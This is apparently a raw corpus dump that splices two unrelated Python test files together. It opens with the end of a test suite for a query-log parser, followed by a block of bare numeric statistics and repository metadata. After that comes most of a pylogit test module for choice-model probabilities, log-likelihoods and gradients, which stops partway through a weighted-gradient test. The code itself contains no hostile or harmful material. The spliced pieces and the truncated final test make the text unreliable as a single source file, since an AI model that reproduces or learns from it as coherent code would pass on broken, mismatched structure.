"""Test parsing logfile and generating query dict in memory"""
gold_records = 4
log_parser = log_parser_util.LogParserUtil()
test_log = StringIO.StringIO(self.gold_log)
flags = {'mod' : False, 'throughput' : False, 'baseline' : False }
(ut_records, unused_baseline_matches) = \
parse_client_harness.parse_queries(log_parser,
test_log,
self._ut_record_func,
None, flags)
self.assertEqual(ut_records, gold_records)
def test_parse_queries_abort(self):
"""Test parsing logfile and generating query dict in memory"""
gold_records = 5
log_parser = log_parser_util.LogParserUtil()
test_log = StringIO.StringIO(self.gold_log_abort)
flags = {'mod' : False, 'throughput' : False, 'baseline' : False }
(ut_records, unused_baseline_matches) = \
parse_client_harness.parse_queries(log_parser,
test_log,
self._ut_record_func,
None, flags)
self.assertEqual(ut_records, gold_records)
def test_process_matches(self):
"""Test conversion of matches hash to two lists. One of ids, one of
hashes sorted by ids"""
with_hashes = {555555555 : 'aaaaaaaaa',
999999999 : '000000000',
111111111 : 'fffffffff'}
no_hashes = {555555555 : '',
999999999 : '',
111111111 : ''}
gold_ids = ['111111111', '555555555', '999999999']
gold_hashes = ['fffffffff', 'aaaaaaaaa', '000000000']
# Test with hashes
(test_ids, test_hashes) = \
parse_client_harness.process_matches(with_hashes)
self.assertEqual(test_ids, gold_ids)
self.assertEqual(test_hashes, gold_hashes)
# Test without hashes
(test_ids, test_hashes) = \
parse_client_harness.process_matches(no_hashes)
self.assertEqual(test_ids, gold_ids)
self.assertEqual(test_hashes, [])
def test_process_query(self):
"""Test preparation of a query that has results for insertion
into the DB."""
# Based on global gold_query4
test_matches = {'13857229552' : 'ffffffffffffffffffff',
'487575939385' : '3a677e6490ff058c492d',
'677029582263' : '55f729ab502948d9375c'}
test_events = {'3305997.438667347' : ['1', ''],
'3305997.448667347' : ['2', '22'],
'3305997.545209896' : ['3', ''],
'3306555.545432123' : ['4', '44'],
'3306667.545209896' : ['5', ''],
'3306668.545209896' : ['6', '']}
good_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*'}
bad_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 28,
ta1_schema.DBP_QUERYLATENCY : repr(553.1068647759967),
ta1_schema.DBP_RESULTSTIME : repr(3306550.545432123),
ta1_schema.DBP_SENDTIME : repr(3305997.438567347),
ta1_schema.DBP_STATUS : ['FAILED', 'Some', 'failure',
'results'],
ta1_schema.DBP_TESTCASEID : '001'}
log_parser = log_parser_util.LogParserUtil()
flags = {'mod' : False, 'throughput' : False, 'baseline' : False}
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-1', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
ret = parse_client_harness.process_query(log_parser, bad_query, \
'10-1', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertFalse(ret)
good_query[ta1_schema.DBP_ISMODIFICATIONQUERY] = 1
flags['mod'] = True
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-2', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
good_query[ta1_schema.DBP_ISMODIFICATIONQUERY] = 0
good_query[ta1_schema.DBP_ISTHROUGHPUTQUERY] = 1
flags['mod'] = False
flags['throughput'] = True
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-3', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
| 46.887168
| 105
| 0.544755
| 1,958
| 21,193
| 5.678754
| 0.14811
| 0.089037
| 0.116557
| 0.012591
| 0.809425
| 0.791888
| 0.784963
| 0.751327
| 0.724795
| 0.710136
| 0
| 0.278065
| 0.36026
| 21,193
| 451
| 106
| 46.991131
| 0.542042
| 0.049026
| 0
| 0.701493
| 0
| 0.027363
| 0.289926
| 0.011354
| 0
| 0
| 0
| 0
| 0.042289
| 1
| 0.012438
| false
| 0
| 0.017413
| 0
| 0.057214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c864e7f6f31ad2a4384b0778ab51ac0cafa7e85
| 81,242
|
py
|
Python
|
tests/test_choice_calcs.py
|
bouzaghrane/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | 1
|
2020-06-01T07:47:12.000Z
|
2020-06-01T07:47:12.000Z
|
tests/test_choice_calcs.py
|
pabloguarda/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_choice_calcs.py
|
pabloguarda/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | 2
|
2021-07-18T02:59:54.000Z
|
2022-03-14T20:32:41.000Z
|
"""
Tests for the choice_calcs.py file.
"""
import unittest
import warnings
from collections import OrderedDict
import numpy as np
import numpy.testing as npt
import pandas as pd
from scipy.sparse import csr_matrix
from scipy.sparse import diags
from scipy.sparse import block_diag
import pylogit.asym_logit as asym
import pylogit.conditional_logit as mnl
import pylogit.choice_calcs as cc
# Use the following to always show the warnings
np.seterr(all='warn')
warnings.simplefilter("always")
class GenericTestCase(unittest.TestCase):
"""
Defines the common setUp method used for the different type of tests.
"""
def setUp(self):
# The set up being used is one where there are two choice situations,
# The first having three alternatives, and the second having only two
# alternatives. There is one generic variable. Two alternative
# specific constants and all three shape parameters are used.
# Create the betas to be used during the tests
self.fake_betas = np.array([-0.6])
# Create the fake outside intercepts to be used during the tests
self.fake_intercepts = np.array([1, 0.5])
# Create names for the intercept parameters
self.fake_intercept_names = ["ASC 1", "ASC 2"]
# Record the position of the intercept that is not being estimated
self.fake_intercept_ref_pos = 2
# Create the shape parameters to be used during the tests. Note that
# these are the reparameterized shape parameters, thus they will be
# exponentiated in the fit_mle process and various calculations.
self.fake_shapes = np.array([-1, 1])
# Create names for the intercept parameters
self.fake_shape_names = ["Shape 1", "Shape 2"]
# Record the position of the shape parameter that is being constrained
self.fake_shape_ref_pos = 2
# Calculate the 'natural' shape parameters
self.natural_shapes = asym._convert_eta_to_c(self.fake_shapes,
self.fake_shape_ref_pos)
# Create an array of all model parameters
self.fake_all_params = np.concatenate((self.fake_shapes,
self.fake_intercepts,
self.fake_betas))
# The mapping between rows and alternatives is given below.
self.fake_rows_to_alts = csr_matrix(np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 0],
[0, 0, 1]]))
# Create the mapping between rows and individuals
self.fake_rows_to_obs = csr_matrix(np.array([[1, 0],
[1, 0],
[1, 0],
[0, 1],
[0, 1]]))
# Create the fake design matrix with columns denoting X
# The intercepts are not included because they are kept outside the
# index in the scobit model.
self.fake_design = np.array([[1],
[2],
[3],
[1.5],
[3.5]])
# Create the index array for this set of choice situations
self.fake_index = self.fake_design.dot(self.fake_betas)
# Create the needed dataframe for the Asymmetric Logit constructor
self.fake_df = pd.DataFrame({"obs_id": [1, 1, 1, 2, 2],
"alt_id": [1, 2, 3, 1, 3],
"choice": [0, 1, 0, 0, 1],
"x": self.fake_design[:, 0],
"intercept": [1 for i in range(5)]})
# Record the various column names
self.alt_id_col = "alt_id"
self.obs_id_col = "obs_id"
self.choice_col = "choice"
# Store the choices as their own array
self.choice_array = self.fake_df[self.choice_col].values
# Create the index specification and name dictionaryfor the model
self.fake_specification = OrderedDict()
self.fake_names = OrderedDict()
self.fake_specification["x"] = [[1, 2, 3]]
self.fake_names["x"] = ["x (generic coefficient)"]
# Bundle args and kwargs used to construct the Asymmetric Logit model.
self.constructor_args = [self.fake_df,
self.alt_id_col,
self.obs_id_col,
self.choice_col,
self.fake_specification]
# Create a variable for the kwargs being passed to the constructor
self.constructor_kwargs = {"intercept_ref_pos":
self.fake_intercept_ref_pos,
"shape_ref_pos": self.fake_shape_ref_pos,
"names": self.fake_names,
"intercept_names":
self.fake_intercept_names,
"shape_names": self.fake_shape_names}
# Initialize a basic Asymmetric Logit model whose coefficients will be
# estimated.
self.model_obj = asym.MNAL(*self.constructor_args,
**self.constructor_kwargs)
# Store a ridge penalty for use in calculations.
self.ridge = 0.5
return None
class ComputationalTests(GenericTestCase):
"""
Tests the computational functions to make sure that they return the
expected results.
"""
# Store a utility transformation function for the tests
def utility_transform(self,
sys_utilities,
alt_IDs,
rows_to_alts,
shape_params,
intercept_params):
return sys_utilities[:, None]
def test_calc_asymptotic_covariance(self):
"""
Ensure that the correct Huber-White covariance matrix is calculated.
"""
ones_array = np.ones(5)
# Create the hessian matrix for testing. It will be a 5 by 5 matrix.
test_hessian = np.diag(2 * ones_array)
# Create the approximation of the Fisher Information Matrix
test_fisher_matrix = np.diag(ones_array)
# Create the inverse of the hessian matrix.
test_hess_inverse = np.diag(0.5 * ones_array)
# Calculated the expected result
expected_result = np.dot(test_hess_inverse,
np.dot(test_fisher_matrix, test_hess_inverse))
# Alias the function being tested
func = cc.calc_asymptotic_covariance
# Perform the test.
function_results = func(test_hessian, test_fisher_matrix)
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(function_results.shape, test_hessian.shape)
npt.assert_allclose(expected_result, function_results)
return None
def test_log_likelihood(self):
"""
Ensure that we correctly calculate the log-likelihood, both with and
without ridge penalties, and both with and without shape and intercept
parameters.
"""
# Create a utility transformation function for testing
def test_utility_transform(x, *args):
return x
# Calculate the index for each alternative for each individual
test_index = self.fake_design.dot(self.fake_betas)
# Exponentiate each index value
exp_test_index = np.exp(test_index)
# Calculate the denominator for each probability
interim_dot_product = self.fake_rows_to_obs.T.dot(exp_test_index)
test_denoms = self.fake_rows_to_obs.dot(interim_dot_product)
# Calculate the probabilities for each individual
prob_array = exp_test_index / test_denoms
# Calculate what the log-likelihood should be
choices = self.fake_df[self.choice_col].values
expected_log_likelihood = np.dot(choices, np.log(prob_array))
# Create a set of intercepts, that are all zeros
intercepts = np.zeros(2)
# Combine all the 'parameters'
test_all_params = np.concatenate([intercepts, self.fake_betas], axis=0)
# Calculate what the log-likelihood should be with a ridge penalty
penalty = self.ridge * (test_all_params**2).sum()
expected_log_likelihood_penalized = expected_log_likelihood - penalty
# Alias the function being tested
func = cc.calc_log_likelihood
# Create the arguments for the function being tested
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
choices,
test_utility_transform]
kwargs = {"intercept_params": intercepts,
"shape_params": None}
# Perform the tests
function_results = func(*args, **kwargs)
self.assertAlmostEqual(expected_log_likelihood, function_results)
# Test the weighted log-likelihood capability
weights = 2 * np.ones(self.fake_design.shape[0])
kwargs["weights"] = weights
function_results_2 = func(*args, **kwargs)
self.assertAlmostEqual(2 * expected_log_likelihood, function_results_2)
kwargs["weights"] = None
# Test the ridge regression calculations
kwargs["ridge"] = self.ridge
function_results_3 = func(*args, **kwargs)
self.assertAlmostEqual(expected_log_likelihood_penalized,
function_results_3)
# Test the function again, this time without intercepts
kwargs["intercept_params"] = None
function_results_4 = func(*args, **kwargs)
self.assertAlmostEqual(expected_log_likelihood_penalized,
function_results_4)
return None
def test_array_size_error_in_calc_probabilities(self):
"""
Ensure that a helpful ValueError is raised when a person tries to
calculate probabilities using BOTH a 2D coefficient array and a 3D
design matrix.
"""
# Alias the function being tested
func = cc.calc_probabilities
# Create fake arguments for the function being tested.
# Note these arguments are not valid in general, but suffice for
# testing the functionality we care about in this function.
args = [np.arange(9).reshape((3, 3)),
np.arange(27).reshape((3, 3, 3)),
None,
None,
None,
None]
# Note the error message that should be shown.
msg_1 = "Cannot calculate probabilities with both 3D design matrix AND"
msg_2 = " 2D coefficient array."
msg = msg_1 + msg_2
self.assertRaisesRegexp(ValueError,
msg,
func,
*args)
return None
def test_return_argument_error_in_calc_probabilities(self):
"""
Ensure that a helpful ValueError is raised when a person tries to
calculate probabilities using BOTH a return_long_probs == False and
chosen_row_to_obs being None.
"""
# Alias the function being tested
func = cc.calc_probabilities
# Create fake arguments for the function being tested.
# Note these arguments are not valid in general, but suffice for
# testing the functionality we care about in this function.
args = [np.arange(9).reshape((3, 3)),
np.arange(9).reshape((3, 3)),
None,
None,
None,
None]
# Note the error message that should be shown.
msg = "chosen_row_to_obs is None AND return_long_probs is False"
self.assertRaisesRegexp(ValueError,
msg,
func,
*args)
return None
def test_1D_calc_probabilities(self):
"""
Ensure that when using a 2D design matrix and 1D vector of parameters,
that the calc_probabilities function returns the correct values. Note
that this test will only verify the functionality under 'normal'
conditions, where the values of the exponentiated indices do not go
to zero nor to infinity.
"""
# Calculate the index vector
expected_index = self.fake_design.dot(self.fake_betas)
# Calculate exp(index)
expected_exp_index = np.exp(expected_index)
# Calculate the sum of exp(index) for each individual
denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
# Calculate the expected probabilities
expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
# Alias the function to be tested
func = cc.calc_probabilities
# Collect the arguments needed for this function
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
function_results = func(*args, **kwargs)
# Perform the tests
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(len(function_results.shape), 1)
self.assertEqual(function_results.shape, (self.fake_design.shape[0],))
npt.assert_allclose(function_results, expected_probs)
return None
def test_return_values_of_calc_probabilities(self):
"""
Ensure that the various configuration of return values can all be
returned.
"""
# Calculate the index vector
expected_index = self.fake_design.dot(self.fake_betas)
# Calculate exp(index)
expected_exp_index = np.exp(expected_index)
# Calculate the sum of exp(index) for each individual
denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
# Calculate the expected probabilities
expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
# Extract the probabilities of the chosen alternatives for each
# observaation
chosen_indices = np.where(self.choice_array == 1)
expected_chosen_probs = expected_probs[chosen_indices]
# Alias the function to be tested
func = cc.calc_probabilities
# Create the chosen_row_to_obs mapping matrix
choices_2d = self.choice_array[:, None]
chosen_row_to_obs = self.fake_rows_to_obs.multiply(choices_2d)
# Collect the arguments needed for this function
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
# kwargs_1 should result in long_probs being returned.
kwargs_1 = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# kwargs_2 should result in (chosen_probs, long_probs being returned)
kwargs_2 = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"chosen_row_to_obs": chosen_row_to_obs,
"return_long_probs": True}
# kwargs_3 should result in chosen_probs being returned.
kwargs_3 = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"chosen_row_to_obs": chosen_row_to_obs,
"return_long_probs": False}
# Collect the expected results
expected_results = [expected_probs,
(expected_chosen_probs, expected_probs),
expected_chosen_probs]
# Perform the tests
for pos, kwargs in enumerate([kwargs_1, kwargs_2, kwargs_3]):
function_results = func(*args, **kwargs)
if isinstance(function_results, tuple):
expected_arrays = expected_results[pos]
for array_pos, array in enumerate(function_results):
current_expected_array = expected_arrays[array_pos]
self.assertIsInstance(array, np.ndarray)
self.assertEqual(array.shape, current_expected_array.shape)
npt.assert_allclose(array, current_expected_array)
else:
expected_array = expected_results[pos]
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(function_results.shape, expected_array.shape)
npt.assert_allclose(function_results, expected_array)
return None
def test_2D_calc_probabilities(self):
"""
Ensure that when using either a 2D design matrix and 2D vector of
parameters, or a 3D design matrix and 1D vector of parameters,
that the calc_probabilities function returns the correct values. Note
that this test will only verify the functionality under 'normal'
conditions, where the values of the exponentiated indices do not go
to zero nor to infinity.
"""
# Designate a utility transform for this test
utility_transform = mnl._mnl_utility_transform
# Calculate the index vector
expected_index = self.fake_design.dot(self.fake_betas)
# Calculate exp(index)
expected_exp_index = np.exp(expected_index)
# Calculate the sum of exp(index) for each individual
denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
# Calculate the expected probabilities
expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
# Create the 2D vector of expected probs
expected_probs_2d = np.concatenate([expected_probs[:, None],
expected_probs[:, None]], axis=1)
# Create the 2D coefficient vector
betas_2d = np.concatenate([self.fake_betas[:, None],
self.fake_betas[:, None]], axis=1)
assert self.fake_design.dot(betas_2d).shape[1] > 1
# Create the 3D design matrix
design_3d = np.concatenate([self.fake_design[:, None, :],
self.fake_design[:, None, :]], axis=1)
# Alias the function to be tested
func = cc.calc_probabilities
# Collect the arguments needed for this function
args = [betas_2d,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
utility_transform]
# The kwargs below mean that only the long format probabilities will
# be returned.
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"chosen_row_to_obs": None,
"return_long_probs": True}
function_results_1 = func(*args, **kwargs)
# Now test the functions with the various multidimensional argumnts
args[0] = self.fake_betas
args[1] = design_3d
function_results_2 = func(*args, **kwargs)
# Now try the results when calling for chosen_probs as well
chosen_row_to_obs = self.fake_rows_to_obs.multiply(
self.choice_array[:, None])
kwargs["chosen_row_to_obs"] = chosen_row_to_obs
chosen_probs, function_results_3 = func(*args, **kwargs)
# Perform the tests using a 2d coefficient array
for function_results in [function_results_1,
function_results_2,
function_results_3]:
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(len(function_results.shape), 2)
self.assertEqual(function_results.shape,
(self.fake_design.shape[0], 2))
npt.assert_allclose(function_results, expected_probs_2d)
chosen_idx = np.where(self.choice_array == 1)[0]
self.assertIsInstance(chosen_probs, np.ndarray)
self.assertEqual(len(chosen_probs.shape), 2)
npt.assert_allclose(chosen_probs, expected_probs_2d[chosen_idx, :])
return None
def test_calc_probabilities_robustness_to_under_overflow(self):
"""
Ensure that the calc_probabilities function correctly handles under-
and overflow in the exponential of the systematic utilities.
"""
# Create a design array that will test the under- and over-flow
# capabilities of the calc_probabilities function.
extreme_design = np.array([[1],
[800 / self.fake_betas[0]],
[-800 / self.fake_betas[0]],
[-800 / self.fake_betas[0]],
[3]])
# Calculate the index vector
expected_index = extreme_design.dot(self.fake_betas)
# Calculate exp(index)
expected_exp_index = np.exp(expected_index)
# Guard against over and underflow
expected_exp_index[1] = np.exp(cc.max_exponent_val)
expected_exp_index[[2, 3]] = np.exp(cc.min_exponent_val)
# Calculate the sum of exp(index) for each individual
denoms = self.fake_rows_to_obs.T.dot(expected_exp_index)
# Calculate the expected probabilities
expected_probs = expected_exp_index / self.fake_rows_to_obs.dot(denoms)
# Guard against underflow
expected_probs[expected_probs == 0.0] = cc.min_comp_value
# Alias the function to be tested
func = cc.calc_probabilities
# Collect the arguments needed for this function
args = [self.fake_betas,
extreme_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
function_results = func(*args, **kwargs)
# Perform the tests
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(len(function_results.shape), 1)
self.assertEqual(function_results.shape, (self.fake_design.shape[0],))
npt.assert_allclose(function_results, expected_probs)
return None
def test_calc_gradient_no_shapes_no_intercepts(self):
"""
Ensure that calc_gradient returns the correct values when there are no
shape parameters and no intercept parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
def transform_deriv_v(*args):
return dh_dv
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
def transform_deriv_shapes(*args):
return None
# Collect the arguments needed to calculate the probabilities
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Calculate the required probabilities
probs = cc.calc_probabilities(*args, **kwargs)
# In this scenario, the gradient should be (Y- P)'(dh_dv * dv_db)
# which simplifies to (Y- P)'(dh_dv * X)
error_vec = (self.choice_array - probs)[None, :]
expected_gradient = error_vec.dot(dh_dv.dot(self.fake_design)).ravel()
# Alias the function being tested
func = cc.calc_gradient
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
None,
None,
None,
None]
function_gradient = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_gradient, np.ndarray)
self.assertEqual(function_gradient.shape, (self.fake_betas.shape[0],))
npt.assert_allclose(function_gradient, expected_gradient)
# Test the gradient function with the ridge argument
gradient_args[-2] = self.ridge
new_expected_gradient = (expected_gradient -
2 * self.ridge * self.fake_betas[0])
function_gradient_penalized = func(*gradient_args)
self.assertIsInstance(function_gradient_penalized, np.ndarray)
self.assertEqual(function_gradient_penalized.shape,
(self.fake_betas.shape[0],))
npt.assert_allclose(function_gradient_penalized, new_expected_gradient)
# Test the gradient function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
new_expected_gradient_weighted =\
2 * expected_gradient - 2 * self.ridge * self.fake_betas[0]
func_gradient_penalized_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_penalized_weighted, np.ndarray)
self.assertEqual(func_gradient_penalized_weighted.shape,
(self.fake_betas.shape[0],))
npt.assert_allclose(func_gradient_penalized_weighted,
new_expected_gradient_weighted)
return None
def test_calc_gradient_no_shapes(self):
"""
Ensure that calc_gradient returns the correct values when there are no
shape parameters but there are intercept parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
def transform_deriv_v(*args):
return dh_dv
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
dh_d_intercept = self.fake_rows_to_alts[:, 1:]
def transform_deriv_intercepts(*args):
return dh_d_intercept
def transform_deriv_shapes(*args):
return None
# Collect the arguments needed to calculate the probabilities
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Calculate the required probabilities
probs = cc.calc_probabilities(*args, **kwargs)
# In this scenario, the gradient should be (Y- P)'(dh_d_theta)
# which simplifies to (Y- P)'[dh_d_intercept | dh_d_beta]
# and finally to (Y- P)'[dh_d_intercept | dh_dv * X]
error_vec = (self.choice_array - probs)[None, :]
dh_d_beta = dh_dv.dot(self.fake_design)
dh_d_theta = np.concatenate((dh_d_intercept.A, dh_d_beta), axis=1)
expected_gradient = error_vec.dot(dh_d_theta).ravel()
# Alias the function being tested
func = cc.calc_gradient
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
self.fake_intercepts,
None,
None,
None]
function_gradient = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_gradient, np.ndarray)
self.assertEqual(function_gradient.shape,
(self.fake_betas.shape[0] +
self.fake_intercepts.shape[0],))
npt.assert_allclose(function_gradient, expected_gradient)
# Test the gradient function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_intercepts.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
return None
def test_calc_gradient_no_intercepts(self):
"""
Ensure that calc_gradient returns the correct values when there are no
intercept parameters but there are shape parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
def transform_deriv_v(*args):
return dh_dv
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
fake_deriv = np.exp(self.fake_shapes)[None, :]
dh_d_shape = self.fake_rows_to_alts[:, 1:].multiply(fake_deriv)
def transform_deriv_shapes(*args):
return dh_d_shape
# Collect the arguments needed to calculate the probabilities
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Calculate the required probabilities
probs = cc.calc_probabilities(*args, **kwargs)
# In this scenario, the gradient should be (Y- P)'(dh_d_theta)
# which simplifies to (Y- P)'[dh_d_shape | dh_d_beta]
# and finally to (Y- P)'[dh_d_shape | dh_dv * X]
error_vec = (self.choice_array - probs)[None, :]
dh_d_beta = dh_dv.dot(self.fake_design)
dh_d_theta = np.concatenate((dh_d_shape.A, dh_d_beta), axis=1)
expected_gradient = error_vec.dot(dh_d_theta).ravel()
# Alias the function being tested
func = cc.calc_gradient
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
None,
self.fake_shapes,
None,
None]
function_gradient = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_gradient, np.ndarray)
self.assertEqual(function_gradient.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(function_gradient, expected_gradient)
# Perform the tests with a weighted gradient
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
# Test the gradient function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
return None
def test_calc_gradient_shapes_and_intercepts(self):
"""
Ensure that calc_gradient returns the correct values when there are
shape and intercept parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
dh_dv = diags(np.ones(self.fake_design.shape[0]), 0, format='csr')
def transform_deriv_v(*args):
return dh_dv
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
dh_d_intercept = self.fake_rows_to_alts[:, 1:]
def transform_deriv_intercepts(*args):
return dh_d_intercept
fake_deriv = np.exp(self.fake_shapes)[None, :]
dh_d_shape = self.fake_rows_to_alts[:, 1:].multiply(fake_deriv)
def transform_deriv_shapes(*args):
return dh_d_shape
# Collect the arguments needed to calculate the probabilities
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Calculate the required probabilities
probs = cc.calc_probabilities(*args, **kwargs)
# In this scenario, the gradient should be (Y- P)'(dh_d_theta)
# which simplifies to (Y- P)'[dh_d_shape | dh_d_intercept | dh_d_beta]
# and finally to (Y- P)'[dh_d_shape | dh_d_intercept | dh_dv * X]
error_vec = (self.choice_array - probs)[None, :]
dh_d_beta = dh_dv.dot(self.fake_design)
dh_d_theta = np.concatenate((dh_d_shape.A,
dh_d_intercept.A,
dh_d_beta), axis=1)
expected_gradient = error_vec.dot(dh_d_theta).ravel()
# Alias the function being tested
func = cc.calc_gradient
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
self.fake_intercepts,
self.fake_shapes,
None,
None]
function_gradient = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_gradient, np.ndarray)
self.assertEqual(function_gradient.shape,
(self.fake_betas.shape[0] +
self.fake_intercepts.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(function_gradient, expected_gradient)
# Test the gradient function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
